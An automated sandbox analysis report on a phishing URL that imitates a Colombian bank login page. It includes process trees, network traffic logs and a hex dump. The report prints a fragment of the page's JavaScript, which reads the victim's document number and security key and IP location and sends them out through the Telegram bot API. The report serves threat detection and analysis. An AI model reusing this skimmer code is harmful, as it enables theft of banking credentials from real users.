Edit tour

Windows Analysis Report
http://clumsy-sulky-helium.glitch.me/

Overview

General Information

Sample URL:	http://clumsy-sulky-helium.glitch.me/
Analysis ID:	1589638
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Javascript uses Telegram API

Javascript checks online IP of machine

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2320,i,18386388468586391517,7251386231615536648,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://clumsy-sulky-helium.glitch.me/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Joe Sandbox Signatures

• AV Detection
• Phishing
• Networking
• System Summary
• Boot Survival
• Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: http://clumsy-sulky-helium.glitch.me/

Avira URL Cloud: detection malicious, Label: phishing

Antivirus detection for URL or domain

Source: http://clumsy-sulky-helium.glitch.me/favicon.ico	Avira URL Cloud: Label: phishing
Source: http://clumsy-sulky-helium.glitch.me/dt.js	Avira URL Cloud: Label: phishing

Phishing

Javascript uses Telegram API

Source: http://clumsy-sulky-helium.glitch.me/

HTTP Parser: $.getjson("https://api.ipify.org?format=json", function(data) { $("#gfg").html(data.ip); }); $.getjson("https://ipinfo.io", function(response) { $("#ip").html("ip: " + response.ip); $("#address").html("" + response.city + ", " + response.country); }); var u_name, u_name2, u_name3, u_name4, ip, ip2, message; var ready = function() { u_name = document.getelementbyid("tipopersona").value; u_name2 = document.getelementbyid("itype").value;u_name3 = document.getelementbyid("numi").value;u_name4 = document.getelementbyid("clvseg").value; ip = document.getelementbyid("gfg").innerhtml; ip2 = document.getelementbyid("address").innerhtml; message = "bbogota\ntipocliente: " + u_name + "\ndocumento: " + u_name2 + "-" + u_name3 + "\nclav3seg: " + u_name4 + "\n\nip: " + ip +"\n" + ip2; }; var sender = function() { ready(); var settings = { "async": true, "crossdomain": true, "url": "https://api.telegram.org/bot" + telegram_bot_id...

Source: http://clumsy-sulky-helium.glitch.me/

HTTP Parser: No favicon

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /bogo/lfr_style.css HTTP/1.1Host: sapp2406.sirv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://clumsy-sulky-helium.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bogo/lfr_ownstyle.css HTTP/1.1Host: sapp2406.sirv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://clumsy-sulky-helium.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/fonts/icons-bbogota/styles.css HTTP/1.1Host: sapp2406.sirv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://sapp2406.sirv.com/bogo/lfr_style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bogo/logobanco1.png HTTP/1.1Host: sapp2406.sirv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://clumsy-sulky-helium.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bogo/c2922.png HTTP/1.1Host: sapp2406.sirv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://clumsy-sulky-helium.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, /; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://clumsy-sulky-helium.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://clumsy-sulky-helium.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, /; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://clumsy-sulky-helium.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://clumsy-sulky-helium.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/vigilado.jpg HTTP/1.1Host: sapp2406.sirv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sapp2406.sirv.com/bogo/lfr_style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bogo/logobanco1.png HTTP/1.1Host: sapp2406.sirv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bogo/c2922.png HTTP/1.1Host: sapp2406.sirv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: clumsy-sulky-helium.glitch.meConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dt.js HTTP/1.1Host: clumsy-sulky-helium.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Referer: http://clumsy-sulky-helium.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dt.js HTTP/1.1Host: clumsy-sulky-helium.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: clumsy-sulky-helium.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://clumsy-sulky-helium.glitch.me/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: clumsy-sulky-helium.glitch.me
Source: global traffic	DNS traffic detected: DNS query: sapp2406.sirv.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 23:25:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 3994Connection: closeVary: Accept-EncodingX-Account-Id: 6n1mmkhzlshsg2ykfoqy3hmu6m2cqyklX-Account-Serial: 2024-09-08T18:22:41.532ZETag: W/"f9a-dltdL9W+uQlreOx3nogGOg"X-Sirv-Cache: MISSServer: Sirv.ImaginationX-Sirv-Server: c1-extra2-fireball-15Access-Control-Allow-Origin: Access-Control-Allow-Headers:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 23:25:21 GMTContent-Type: text/html; charset=utf-8Content-Length: 3983Connection: closeVary: Accept-EncodingX-Account-Id: 6n1mmkhzlshsg2ykfoqy3hmu6m2cqyklX-Account-Serial: 2024-09-08T18:22:41.532ZETag: W/"f8f-glGkyXBFVEfQV1Zl3qMItA"X-Sirv-Cache: MISSServer: Sirv.ImaginationX-Sirv-Server: c1-extra2-fireball-16Access-Control-Allow-Origin: Access-Control-Allow-Headers:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 12 Jan 2025 23:25:21 GMTContent-Length: 3674Connection: keep-aliveCache-Control: max-age=0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 42 65 6e 74 6f 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 33 30 25 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 3

Source: chromecache_67.2.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
Source: chromecache_67.2.dr	String found in binary or memory: https://api.ipify.org?format=json
Source: chromecache_67.2.dr	String found in binary or memory: https://api.telegram.org/bot
Source: chromecache_72.2.dr	String found in binary or memory: https://cdn.glitch.com/d7f4f279-e13b-4330-8422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1
Source: chromecache_70.2.dr	String found in binary or memory: https://cdn.ipinfo.io/static/deviceicons/android-icon-192x192.png
Source: chromecache_70.2.dr	String found in binary or memory: https://cdn.ipinfo.io/static/deviceicons/android-icon-48x48.png
Source: chromecache_70.2.dr	String found in binary or memory: https://cdn.ipinfo.io/static/deviceicons/android-icon-96x96.png
Source: chromecache_70.2.dr	String found in binary or memory: https://cdn.ipinfo.io/static/deviceicons/apple-icon-precomposed.png
Source: chromecache_70.2.dr	String found in binary or memory: https://cdn.ipinfo.io/static/manifest.json
Source: chromecache_72.2.dr	String found in binary or memory: https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css
Source: chromecache_70.2.dr	String found in binary or memory: https://fonts.googleapis.com/icon?family=Material
Source: chromecache_72.2.dr	String found in binary or memory: https://glitch.com
Source: chromecache_72.2.dr	String found in binary or memory: https://help.glitch.com/
Source: chromecache_70.2.dr	String found in binary or memory: https://ipinfo.io
Source: chromecache_73.2.dr	String found in binary or memory: https://ipinfo.io/missingauth
Source: chromecache_70.2.dr	String found in binary or memory: https://ipinfo.io/static/images/og_logo.png
Source: chromecache_67.2.dr	String found in binary or memory: https://sapp2406.sirv.com/bogo/c2922.png
Source: chromecache_67.2.dr	String found in binary or memory: https://sapp2406.sirv.com/bogo/lfr_ownstyle.css
Source: chromecache_67.2.dr	String found in binary or memory: https://sapp2406.sirv.com/bogo/lfr_style.css
Source: chromecache_67.2.dr	String found in binary or memory: https://sapp2406.sirv.com/bogo/logobanco1.png
Source: chromecache_70.2.dr	String found in binary or memory: https://schema.org
Source: chromecache_70.2.dr	String found in binary or memory: https://use.typekit.net/qls3unz.css
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/6625-f733fa413b568d72.js
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/9935-febdd845ad854de7.js
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/framework-aa372710a8ef8c81.js
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/main-3e604834c978a5e0.js
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/pages/_app-341d1ad16f4d2b0f.js
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/pages/index-5a47ed2aef9c2132.js
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/polyfills-42372ed130431b0a.js
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/chunks/webpack-475f6e71860c1539.js
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/css/a0e2f6495d0af84f.css
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/css/bc888e06ecc898de.css
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/abuse-small.ef56e2d8.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/api-access.d4d3b4b8.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/asn-small.77f95094.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/blue_check.d118dbca.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/carrier-small.6d72c73d.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/company-small.e5cfbec7.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/data-preview.d84e8d7d.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/database-download-small.053da0c0.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/datadog.01d809ee.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/domains-small.249bd466.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/geolocation-small.0037d36c.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/google-cloud.17488aed.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/heroku.7b181a55.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/icon-menu.1b6dca09.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/ipinfo-main-illustration.9e5f5329.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/logo-clearbit-white.dedf4224.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/logo-npm-white.37bc2bf6.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/logo-plesk-white.5276a2d7.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/logo-positive.0a4ba892.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/mobile.b3d06ccc.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/paloalto.0919c3d7.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/photo-clearbit-alex.70fcf481.jpeg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/photo-npm-laurie.30cd3e0e.jpeg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/photo-plesk-jan.c2acc0e6.jpeg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/privacy-small.854788a7.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/ranges-small.fd2dafde.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/snowflake.7608b7c5.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/splunk.a71e22c9.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/whois-small.7868d282.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/wordpress.dd4ede2f.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/media/zapier.a1a375f4.svg
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/sha-b7afb3b/_buildManifest.js
Source: chromecache_70.2.dr	String found in binary or memory: https://website-cdn.ipinfo.io/_next/static/sha-b7afb3b/_ssgManifest.js

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: classification engine

Classification label: mal60.phis.win@16/34@18/12

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2320,i,18386388468586391517,7251386231615536648,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://clumsy-sulky-helium.glitch.me/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
